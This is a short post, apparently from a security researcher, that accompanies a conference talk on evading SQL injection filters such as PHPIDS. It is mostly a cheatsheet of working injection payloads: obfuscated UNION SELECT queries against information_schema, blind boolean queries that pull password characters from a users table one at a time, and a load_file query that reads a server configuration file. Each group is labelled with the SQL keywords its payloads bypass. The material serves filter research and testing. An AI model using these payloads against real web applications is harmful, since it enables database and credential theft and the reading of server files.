This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years of PHPIDS filter evasion at the CONFidence 2.0 conference. For a quicker reference you can use the following cheatsheet. A more detailed explanation can be found in the slides or in the talk (video should come online in a few weeks).

Keyword filter

des_encrypt('a') != des_encrypt('A')
Space(0) = trim(version()from(version()))

'union all select all`table_name`foo from`information_schema`.
%a0union%a0select%09group_concat(table_name)….
/**/union/*!50000select*/table_name`foo`/**/…
(0)union(select(table_name),column_name,…

' and (select pass from users limit 1)='secret
' and (select pass from users where id =1)='a
' and (select pass from users group by id having id = 1)='a
' and length((select pass from users having substr(pass,1,1)='a'))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
' and (select substr(group_concat(pass),1,1) from users)='a
' and substr((select max(pass) from users),1,1)='a
' and substr((select max(replace(pass,'lastpw','')) from users),1,1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)='a